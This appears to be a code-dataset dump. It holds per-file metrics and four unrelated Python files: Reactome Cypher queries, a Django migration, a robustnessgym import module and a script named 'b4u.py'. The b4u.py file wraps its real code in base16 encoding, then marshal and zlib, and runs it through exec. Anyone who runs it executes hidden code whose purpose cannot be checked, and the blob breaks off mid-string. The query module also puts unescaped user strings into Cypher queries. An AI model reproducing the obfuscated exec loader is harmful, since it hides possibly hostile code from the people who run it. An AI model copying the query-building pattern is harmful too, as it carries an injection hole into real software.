| 3,726.8 | 10,686 | 0.623001 | 1,777 | 18,634 | 6.532921 | 0.919527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000059 | 0.094129 | 18,634 | 4 | 10,687 | 4,658.5 | 0.687678 | 0.000644 | 0 | 0 | 0 | 0 | 0.623577 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.5 | 0.5 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 7 |
ba35a5f750d673fdc5f080371ce53e475fc373dc | 11,431 | py | Python | src/Python/queries.py | PathwayAnalysisPlatform/ProteoformNetworks | 3d31e5b3cb4abc45e6419fa982c08b3dc5c2624e | [
"Apache-2.0"
] | 1 | 2019-08-16T12:40:14.000Z | 2019-08-16T12:40:14.000Z | src/Python/queries.py | PathwayAnalysisPlatform/ProteoformNetworks | 3d31e5b3cb4abc45e6419fa982c08b3dc5c2624e | [
"Apache-2.0"
] | 9 | 2019-08-16T07:33:33.000Z | 2022-03-04T22:20:02.000Z | src/Python/queries.py | PathwayAnalysisPlatform/ProteoformNetworks | 3d31e5b3cb4abc45e6419fa982c08b3dc5c2624e | [
"Apache-2.0"
] | 1 | 2022-02-21T17:42:48.000Z | 2022-02-21T17:42:48.000Z | from config import proteoforms, genes, proteins, sm
QUERIES_PARTICIPANTS = {
genes: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'}),
(pe)-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe.stId as Entity, pe.displayName as Name,
last(labels(pe)) as Type, head(re.geneName) as Id, re.databaseName AS Database,
head([scores IN relationships(p) | type(scores)]) as Role
ORDER BY Pathway, Reaction, Role, Type
""",
proteins: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'}),
(pe)-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe.stId as Entity, pe.displayName as Name,
last(labels(pe)) as Type, re.identifier as Id, head(re.geneName) as PrevId,
re.databaseName AS Database, head([scores IN relationships(p) | type(scores)]) as Role
ORDER BY Pathway, Reaction, Role, Type
""",
proteoforms: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'}),
(pe)-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe, re, head([x IN relationships(p) | type(x)]) as Role
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT Pathway, Reaction, pe.stId as Entity, pe.displayName as Name, last(labels(pe)) as Type,
CASE
WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier
ELSE re.identifier
END as Id, re.identifier as PrevId,
mod.identifier as ptm_type, tm.coordinate as ptm_coordinate, re.databaseName as Database, Role
ORDER BY ptm_type, ptm_coordinate
WITH DISTINCT Pathway, Reaction, Entity, Name, Type, Id, PrevId,
COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms,
Database, Role
RETURN DISTINCT Pathway, Reaction, Entity, Name, Type, (Id+ptms) as Id, PrevId, Database, Role
ORDER BY Pathway, Reaction, Role
""",
sm: """
MATCH (pw:Pathway{speciesName:'Homo sapiens'})-[:hasEvent]->(rle:ReactionLikeEvent{speciesName:'Homo sapiens'}),
p = (rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:SimpleEntity),
(pe)-[:referenceEntity]->(re:ReferenceEntity)-[:referenceDatabase]->(rd:ReferenceDatabase)
RETURN DISTINCT pw.stId as Pathway, rle.stId as Reaction, pe.stId as Entity, pe.displayName as Name,
last(labels(pe)) as Type, "sm_" + pe.displayName as Id, "sm_" + rle.stId + "_" + pe.displayName as UniqueId,
rd.displayName AS Database,
head([scores IN relationships(p) | type(scores)]) as Role
ORDER BY Pathway, Reaction, Role, Type
"""
}
def get_query_participants_by_pathway(level, pathway="", reaction=""):
query = QUERIES_PARTICIPANTS[level]
if len(pathway) > 0:
query = query.replace("Pathway{speciesName:'Homo sapiens'}",
f"Pathway{{speciesName:'Homo sapiens', stId:'{pathway}'}}")
if len(reaction) > 0:
query = query.replace("ReactionLikeEvent{speciesName:'Homo sapiens'}",
f"ReactionLikeEvent{{speciesName:'Homo sapiens', stId:'{reaction}'}}")
return query
QUERIES_COMPONENTS = {
genes: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT c.stId as Complex, pe.stId AS Entity, pe.displayName AS Name, last(labels(pe)) as Type, head(re.geneName) as Id
ORDER BY Complex
""",
proteins: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
RETURN DISTINCT c.stId as Complex, pe.stId AS Entity, pe.displayName AS Name, last(labels(pe)) as Type, re.identifier as Id, head(re.geneName) as PrevId
ORDER BY Complex
""",
proteoforms: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT c, pe, last(labels(pe)) as Type, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT c.stId as Complex,
pe.stId AS Entity,
pe.displayName AS Name,
Type,
CASE
WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier
ELSE re.identifier
END as Id, re.identifier as PrevId,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY ptm_type, ptm_coordinate
WITH DISTINCT Complex, Entity, Name, Type, Id, PrevId,
COLLECT(
ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END
) AS ptms
RETURN DISTINCT Complex, Entity, Name, Type, (Id+ptms) as Id, PrevId
ORDER BY Complex
""",
sm: """
MATCH (c:Complex{speciesName:'Homo sapiens'})-[:hasComponent|hasMember|hasCandidate*]->(pe:SimpleEntity)
RETURN DISTINCT c.stId as Complex, pe.stId AS Entity, pe.displayName as Name, last(labels(pe)) as Type, "sm_" + pe.displayName as Id, "sm_" + c.stId + "_" + pe.displayName as UniqueId
ORDER BY Complex
"""
}
QUERY_GET_COMPLEXES_BY_PATHWAY_OR_REACTION = """
MATCH (p:Pathway{speciesName:'Homo sapiens'})-[:hasEvent*]->(r:ReactionLikeEvent{speciesName:"Homo sapiens"})-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator*]->(pe:Complex)
RETURN DISTINCT pe.stId as Complex, pe.displayName AS ComplexName, labels(pe)
"""
QUERY_REACTIONS_ONLY_WITH_EWAS_PARTICIPANTS = """
MATCH p = (rle:ReactionLikeEvent{speciesName:"Homo sapiens"})-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:PhysicalEntity)
WITH DISTINCT rle.stId as Reaction, collect(pe.stId) as Entity, collect(last(labels(pe))) as Type, collect( pe.displayName) as names
WHERE size(Type) = 1 AND "EntityWithAccessionedSequence" in Type
RETURN Reaction, Entity, Type, names
"""
QUERY_REACTIONS_WITH_ONLY_SMALL_MOLECULE_PARTICIPANTS = """
MATCH p = (rle:ReactionLikeEvent{speciesName:"Homo sapiens"})-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:PhysicalEntity)
WITH DISTINCT rle.stId as Reaction, collect(DISTINCT pe.stId) as Entity, collect(DISTINCT last(labels(pe))) as Type, collect(DISTINCT pe.displayName) as names
WHERE size(Type) <= 1 AND "SimpleEntity" in Type
RETURN Reaction, Entity, Type, names
"""
QUERY_GET_ALL_PROTEOFORMS = """
MATCH (pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pe, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT pe.stId as Entity,
pe.displayName as Name,
CASE WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier ELSE re.identifier END as Id,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY ptm_type, ptm_coordinate
WITH DISTINCT Entity, Name, Id, COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms
WITH DISTINCT Entity, Name, (Id+ptms) as Id
RETURN DISTINCT Id ORDER BY Id
"""
QUERY_GET_PROTEOFORMS_OF_EACH_PROTEIN = """
MATCH (pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pe, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT pe.stId as Entity,
pe.displayName as Name,
re.identifier as Protein,
CASE WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier ELSE re.identifier END as Id,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY Protein, ptm_type, ptm_coordinate
WITH DISTINCT Entity, Name, Protein, Id, COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms
WITH DISTINCT Entity, Name, Protein, (Id+ptms) as Proteoform ORDER BY Proteoform
WITH DISTINCT Protein, COLLECT(DISTINCT Proteoform) as Proteoforms ORDER By Protein
RETURN DISTINCT Protein, Proteoforms
"""
QUERY_GET_NUM_PROTEOFORMS_PER_PROTEIN = """
MATCH (pe:EntityWithAccessionedSequence{speciesName:'Homo sapiens'})-[:referenceEntity]->(re:ReferenceEntity{databaseName:"UniProt"})
WITH DISTINCT pe, re
OPTIONAL MATCH (pe)-[:hasModifiedResidue]->(tm:TranslationalModification)-[:psiMod]->(mod:PsiMod)
WITH DISTINCT pe.stId as Entity,
pe.displayName as Name,
re.identifier as Protein,
CASE WHEN re.variantIdentifier IS NOT NULL THEN re.variantIdentifier ELSE re.identifier END as Id,
mod.identifier as ptm_type,
tm.coordinate as ptm_coordinate
ORDER BY Protein, ptm_type, ptm_coordinate
WITH DISTINCT Entity, Name, Protein, Id, COLLECT(ptm_type + ":" + CASE WHEN ptm_coordinate IS NOT NULL THEN ptm_coordinate ELSE "null" END) AS ptms
WITH DISTINCT Entity, Name, Protein, (Id+ptms) as Proteoform ORDER BY Proteoform
WITH DISTINCT Protein, COLLECT(DISTINCT Proteoform) as Proteoforms ORDER By Protein
WITH Protein, Proteoforms, size(Proteoforms) as NumProteoforms
WHERE NumProteoforms > 1
RETURN DISTINCT Protein, Proteoforms, NumProteoforms ORDER BY NumProteoforms DESC
"""
QUERY_GET_PATHWAYS_BY_PROTEIN = """
MATCH (p:Pathway{speciesName:"Homo sapiens"})-[:hasEvent*]->(rle:ReactionLikeEvent{speciesName:"Homo sapiens"}),
(rle)-[:input|output|catalystActivity|physicalEntity|regulatedBy|regulator|hasComponent|hasMember|hasCandidate*]->(pe:PhysicalEntity),
(pe)-[:referenceEntity]->(re:ReferenceEntity{identifier:"P04049", databaseName:"UniProt"})
RETURN DISTINCT p.stId AS PathwayId, p.displayName AS Pathway, re.identifier AS Identifier
ORDER BY PathwayId, Identifier
"""
| 62.464481 | 218 | 0.711574 | 1,356 | 11,431 | 5.938053 | 0.088496 | 0.05775 | 0.084699 | 0.022603 | 0.828117 | 0.811972 | 0.797069 | 0.785768 | 0.762295 | 0.753105 | 0 | 0.001052 | 0.168402 | 11,431 | 182 | 219 | 62.807692 | 0.845992 | 0 | 0 | 0.597633 | 0 | 0.230769 | 0.918467 | 0.335491 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005917 | false | 0 | 0.005917 | 0 | 0.017751 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ba43a3b8b8e7aa116e22f1e3b33a65fbfcc8aa0b | 2,352 | py | Python | business_register/migrations/0016_auto_20200626_1000.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0016_auto_20200626_1000.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0016_auto_20200626_1000.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-06-26 10:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('business_register', '0015_historicalfounderfull'),
]
operations = [
migrations.AlterField(
model_name='exchangedatafop',
name='end_number',
field=models.CharField(max_length=30, null=True),
),
migrations.AlterField(
model_name='exchangedatafop',
name='start_number',
field=models.CharField(max_length=30, null=True),
),
migrations.AlterField(
model_name='fop',
name='contact_info',
field=models.CharField(max_length=200, null=True),
),
migrations.AlterField(
model_name='fop',
name='estate_manager',
field=models.CharField(max_length=125, null=True),
),
migrations.AlterField(
model_name='fop',
name='hash_code',
field=models.CharField(db_index=True, max_length=600),
),
migrations.AlterField(
model_name='fop',
name='termination_cancel_info',
field=models.CharField(max_length=275, null=True),
),
migrations.AlterField(
model_name='fop',
name='vp_dates',
field=models.CharField(max_length=140, null=True),
),
migrations.AlterField(
model_name='historicalfop',
name='contact_info',
field=models.CharField(max_length=200, null=True),
),
migrations.AlterField(
model_name='historicalfop',
name='estate_manager',
field=models.CharField(max_length=125, null=True),
),
migrations.AlterField(
model_name='historicalfop',
name='hash_code',
field=models.CharField(db_index=True, max_length=600),
),
migrations.AlterField(
model_name='historicalfop',
name='termination_cancel_info',
field=models.CharField(max_length=275, null=True),
),
migrations.AlterField(
model_name='historicalfop',
name='vp_dates',
field=models.CharField(max_length=140, null=True),
),
]
| 31.783784 | 66 | 0.568027 | 224 | 2,352 | 5.776786 | 0.254464 | 0.185471 | 0.231839 | 0.268934 | 0.867079 | 0.867079 | 0.802937 | 0.802937 | 0.731066 | 0.731066 | 0 | 0.033084 | 0.318878 | 2,352 | 73 | 67 | 32.219178 | 0.774657 | 0.019133 | 0 | 0.865672 | 1 | 0 | 0.133189 | 0.031236 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ba5e739bd09fb3c3ed6a3e87d93a1feef85c0b7e | 152 | py | Python | robustnessgym/slicebuilders/attacks/__init__.py | jessevig/robustness-gym | 37fa9f04dc62638b78cf05b930c8034eb7dcb3e7 | [
"Apache-2.0"
] | 399 | 2021-01-13T17:16:53.000Z | 2022-03-31T11:55:22.000Z | robustnessgym/slicebuilders/attacks/__init__.py | jessevig/robustness-gym | 37fa9f04dc62638b78cf05b930c8034eb7dcb3e7 | [
"Apache-2.0"
] | 22 | 2021-01-09T02:37:44.000Z | 2021-08-29T16:38:49.000Z | robustnessgym/slicebuilders/attacks/__init__.py | jessevig/robustness-gym | 37fa9f04dc62638b78cf05b930c8034eb7dcb3e7 | [
"Apache-2.0"
] | 34 | 2021-01-14T08:02:00.000Z | 2021-11-22T03:54:53.000Z | from robustnessgym.slicebuilders.attacks.morpheus import Morpheus # noqa
from robustnessgym.slicebuilders.attacks.textattack import TextAttack # noqa
| 50.666667 | 77 | 0.855263 | 16 | 152 | 8.125 | 0.5 | 0.261538 | 0.461538 | 0.569231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092105 | 152 | 2 | 78 | 76 | 0.942029 | 0.059211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
ba8af65170b82123703182381bc671985eec432d | 13,124 | py | Python | b4u.py | sillytuktuk2020/b4u | 15b87e4d92f99ac7208e2251dc133731e94d5b31 | [
"Apache-2.0"
] | null | null | null | b4u.py | sillytuktuk2020/b4u | 15b87e4d92f99ac7208e2251dc133731e94d5b31 | [
"Apache-2.0"
] | null | null | null | b4u.py | sillytuktuk2020/b4u | 15b87e4d92f99ac7208e2251dc133731e94d5b31 | [
"Apache-2.0"
] | null | null | null | # Auther : AKSHAY DHAWAN
# GitHub : https://github.com/sillytuktuk2020
# instagram decent_deep_raadhe
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E73225C7830385C7830305C783030785C7839635C786335585C786539725C7865335C7862385C7831315C7866652D3E5C7830355C7839365C7861395A525C786231445C7838395C7862343C3E264C5C7863615C7865335C7866315C786563385C7865625C783139393E325C7839355C7862325D2C5C7838385C783834445C786334245C7863315C7830305C786130255C7863647A5C783966213F5C7866337E795C783932345C786330435C786132645C783866775C786237525C744B255C7839325C7864645C7865385C7830335C7831665C7831615C7864645C724A5C7862653C325C7831305C5C345C7863645C7831395C7839375C7838385C7838395C783965585C7838615C7839655C786134295C78653945585C7831325C7866645C786330715C7831365C7862315C7862345C783137635C7831315C27745C7864325C7865335C7861345C27634E70445C786233595C7865665C7865665C783832655C7862645C7838325C275C7838615C783131325C786636405C7838397A5C7839615C7831315C78393963217A295C74635C7839635C7864315C7861665C7861305C7838335C7866635C78613320425C6E6D6C5C786361595C7838615C786432225C783931345C7865372C24425C783830265C27672C5C7861395C7864645C7862385C7864365C7866612F5C7838305C7862325C7831615F6B705C78633822245C7862395C7861342C5C7831335C7866355C7866305C7831335C7839366524545C786134535C7863655C7831395F5C786233515C7864625C786166475C7862655C7865336C2E5C783038374A5C7831645C7865384C535C786235505C745C7830335C7831335C7830655C7863635F5C7839325C7864345C786236725C7839617B5C78383866425C78653224695C7838635B5C7864646F5C7830656B5C786563555C7865335C7831347C5C783865485C7830385C7863396D775B7229635C783936795C7863385C7862393C3D7E5C7866665C7865395C78643449235C7839303238495C7831385C7838656C5C7831385C786434355C7865305C7863665C7831314446645C7838615C7830312C5C7839325C7838354C616E5B5C7838355C7839635C7831655C7863305C7864385C74475C7866655C7863615C786134535C7863645C786364565C783063255C7831365C7830303D4A485C7863305C7864395C78383449615C7837665C7863305C783839205B3C325C786535445C7863345C7866364A4B5C7831304B5C7839393B5C7831665C7861665C7861662F2E4B5C786465455C786239445C7830635C7831345C786637525C7862635C7830385C7864345C7839637C572B5C786332515C7831345C7863333A5C7831312E5C7863305C7839315B5C7864625C7862615C7830315C7866335C7866645C7865335C7831395C7863395C7861345C786435435C786536385C275C7831635C7830665C7830655C7839645C783833215C7862325C7838665C7862335C783838335C7831615C786264455C7839615C7838383E5C7864315C7838635C783065763D675C786538785C7864655C78646568705C7862305C7865375C7861305C7839625C7862375C783838465D745C78303126255C783162785C7838655C78656239236F5C7831375C7866645C7831355C7839345C7863335C7862615C7830655C7865305C7864357D63765C7865665C7838645C7831355C783830665C7839385C7831305C7863635C7863645C7861655C7866313B755C7861315C7866335C7866315C783066635C7861345C7831665C7838645C7838345C7863645C7839386F595C7839365C7838315C7830325C7862385C7831345C7865635C7838315C7866655C7861315C7865613F405C7863365C7839335C7866615C786266435C7865385C743D5C7863315C7830665C7865395C7830375C7866645C7830375C7839635C7861375C7861305C7861625F5C7831355C276871405C7865365C7830665C7866305C786163755C7830364F5C786462325C7862355C7831655C7866355C7831665C7830345C7839615C7861333C5C783138685C7864334F5C7838315C7831657057525C7830635C7861335C7866665C7861622F5C786333405C7863375C7838355C7838635C745C78303735475C7865385C7831645C7863645C783936385C7861355C7839395C7838317E5C7861305C78663263315C786431445C7862357A5C78653268305C783938515C7831395C7831375C7831335C27645C78653960525C7838645C7865625C78633343465C725C78663437565C5C5C7831375C7831335C786132465F735C7831613E5C7830305C7865365C7838634D5C725C7866345C783065605C783133395C7839336B5A5C7861345C7865325C7865375C7838615C7865644C2A5C786165525C7866395C7839627C475C7861665C5C6A5C7862645C7838635C7831335C786336395C786563645C783135485C7831394E5C745C7838345C783935595C7862626F5C7864365C7863635C7830625C7863382C735C786336235C7863645C7831635C7831355C7861365C7830315C7865625C78636472785C786233242F5C783838655C786363635C7839615C783130645C7839375C7863345C7839615C7864612D5C786637775C78636569265C7839315C7838615C7830665C7866645A5C7861635C786563703C5C783066685C7839365C7831375C786432365C7864315C786635787C5C7838656E5C7861654E2F3F5C7831665C7837663A3D42665C786239755C7865395C7831345C7864392B5C7830315C7831666D5C7866385A595C7865385C7865342B5C7866375C786236745E5C7831635F5D7D5C7831395F5C7862656F745C7864367A57425C7838645C7864657A5C7839615C7839355C7864655C7866612A67605C78613273365C7839625C7839315C783038325C7830665C783132455C786138365C7865385C786234485C783932255C7863325C783032783B5C7863645C7863345A5C7861325C7864625C7864395C7861385C7862656A5C7830305C7861372A47585C725C7838625C7863305C7864625C7866335C7864365C786266705C7839365C786364505C7862335C7831325C7864665C7839395C786164516B496E5C7831315C7863645C7866612C5C275C7864396B21355C7866305C7838365C78646570305C7864635C78316464645C7864655C7839375C7838345C7861375C7863355C7861325C7830665C7865345C7831345C786432545C7837665C786361784D5C78396143585C78663771215C7839395C7831335C786362345C7862315C7862612F5C7839386D525C7863335C7866362C5C78646133685C7830326D6D5C7830365C7866665C7830375C7865665F5C7866305C5C5D5C783036645C783766585C7862395C7830375C7831625C7865325C78613023293C5C7861395C5C6B396A5C7863375C7866342C5C7863375C7861396E5C7830655C7862325C7865655C7838645C7830655C786438424C5C7863355C7838345C7831655C7830385C7830325C7831643D5D5C7864625C7862635C7865335C7862375C7866665C7866655C7864373F5C786566555C786434405C78303541675C7831393277585C7862375C78663756575C7831385C7831395C786231423A5C7864335C7861345C783830425C7864307D5C7864625C7838655C7839324E473B5C78393028395C7862625C78626259245B5C7864655C7863615C7862615C7839375C7864302F5C7865635C783831485C786630545C786131675C7839625C7865305C783966634249585C7839665C7864385C7839615C7839365C7865644A582F5D595C7861365C7865645C7831665C786339525C7831375C7865395C7864655C786439585C7864665C7864375C7866365C7863345C7839615C7831615C7839655C7861323E5C783966226D5C7865635C783137615B5C7863365C7838325C7861645C7864325C7863315C7831365C7864315C786263752B5C7862385C7864305C7831375836745C783961625C7839615C7830633E5C7831375C7865395C7830345C7864322F5C7861636B5C7831335C7866635C7864625C7866615C7863635B5C786166257A5C7861635C7866375C275C7862615C783036485C7862325C7865645C7864317B5C7863335C7864665C7839625C786664355C7862325C7838363A5C783038634643626F5C786334415C783962575C783832305C745C786533765C7861615C7862395C786362205C7838625C7866385C7866655C7831665C7864315A5C7865325C7864325C7838337C5C7864335C7864635C7864635C7830375C7865305C786562775C7866375C7865385C7830335C7838355C7864655C7830355C7862635C725C7863625C7863635C7839332C375C7864645C7862315C7865625C7839645C786234525C7865355C7839395C7863665C7861655C7863312F5C783832785C783861435C7837663D375C7830325C7839345C7839325C78623460425C7831665C745C275C7861642C395C7838355C7831385C7866355C7864625C786431345C786466603B734E255C786231415C7866625C7830363D4C5C783938585C7863375C786232692573265C7861346D35355C7839335C7865333C76405C7839634C5C7861305C7839335C7864355C7866623A255C783833295C786137245C7838625C7863345C783966525C783032415C7831615C7866394A5C7865345C7866625C783832465C786332775C78383770795C7863335C7862645C7863335C7861313B725C786637475C786466635C7865645C7837665C786130223F5C7866335C7861645C7839645C7839365C7831625C7864665C786361295C7866335C7866395C786463595C7838325C783962505C7839335C7862354D5C7864355C78383965245C7831395C7864635C7839635C7839635C7839645C7830635C7864645C7866335C7865355C786439785C783866415C786336715C7866665C7863325C7864657C5C7861305C7861334F5C7866335C7865375C7866335C7863365C7863627B686D5C7864315C7864635C786235455C7864335C7830625C7865625C7864615C7865645C7831345C7862615C78386132575C275C783963355C7862665C7866355C7863615C7838325C7865645C7838655C7864655C7865375C7839644E6B5C7838375C7861625C7830635C78653440225C7864325C7830333A5C7861665C7862395C7864355C7866395C7863365C7862655C7865653C6B5C7862335C7864335C7838615C7861333A5C786164592B5C7863376F775C786565555C783037785C7866365C7831397D395C7862625C7866655C7838383E5C7831635C7839665C7839635C7862655C7831625C7838665C78376654745C783062355C783132705C7861375C7865645C7863326C295C7863315C7862335C7866375C7830335C7862645C7862645C7861315C786633295C7838645C7863645C7864355C7861305C7865615C7831305C786533545C7866377268535C7866325C7861615C7861313A335C7861627B5C744A5C7830375C7862615C7865325C7831325C7839307A755C7864335C745C783136346C455C7839355C7831365C7861632058355C786465375C7839375C7865375C786435415C7861345C7862334A5C7864625C7839395C7864615C7839655C7864375C7864305C7866315C7863315C74465C7861304C5C786535765C786138255C7831395C7830305C78316636675C7831655C783035685C7838645C7831615C7831635C7838655C7861385C7864345C7830655C783831235C7830315C7831385C7839355C7838632F5C7831642A5C7830325570604E5C7864375C7864305C7830625C7839354C415C7831325C7831305C7830665C786130625C786134765C7863365C78666461255C7861335C7864656F2D5C7861325C7864305C7862305C786565415C783830465C786562745C7838355C783833265C783033425C7839355C783961625C783932565C7831365C7865315C7831345C7830385C7831635C7861305C783031605C7866305C786163695C7831307A5C7839365C7863305C7838665C7861345C7831665C783931475C786338595C7839365C786361325C7863305C786433735C786163215C7865625C7830383A5C7838335C7864655C7830335C7865373478204B5C7866665C7865305C7863305C7863335C7830375C7861335C7863335C7865315C7865655C783162375C7863325C7838375C7830375C786662436F323D5C7864635C786337435C7863665C7838645C7861325C7864305C78316445215C275C7831315C78396330285C7862342A5C7838315C5C5C7865365C7863345C7861667B5C275C786564346C3C5C7831615C786564585C7863615D2C5C7866643F5F5C7838643F5C786333715C7830345C7838655C7831635C7839325C783034295C783065635C7839615C7839315C783830465C7862655C7864625C7831305C7838353A7D325C7863385C7861395C7866615C7865635C6E5C7839623A61214E5C7838384F5C7862325C7865305C7865365C7861615C7864615C786632505C78623163476F5C7838615C7864615C783134585C7830315C783034762C5C786165665C7839615C7830354224705C7839325C7831325C7861635C7865305C7839305C7830315C7866635C7865315C7861335C7865663A5C786333375C7864655C78663420245C7838375C7864335C7866645C7864315C7863345C7838355C786337515C7865387A5C786262615C7865385C7865645C783865765C7866375C7866315C7830385C7865667A5C7839365C7839653A5C7839635C786231315C7838305C7866365C783933595C7863645C7864653C325F5C7839625C7862665C7864393337215C7830305C7861395C786461335C7865306A5C7831635C786363235C7831615C7866355C7863635C7831325C783036602B20545C7863617C5C7830365C7830635C7865305C786261205C7866355C783132225C7831355C7862625C7838345C7830355E343040285C7862315C7830315C7863325C6E5C7831645C786130366E5C7831635C7830313E3D5C786633397C40645C783038235C7831665C7839356267685C7866655C78616371585C7866385C7864355C7864375C7830355C7830373A285C7864624C5C7861335C786264325C7861613B5C7830625C7861375C7863385C7864355C7838375C7830385C7831625C7838325C7861345C786134605C7837665C7865315C786334645C783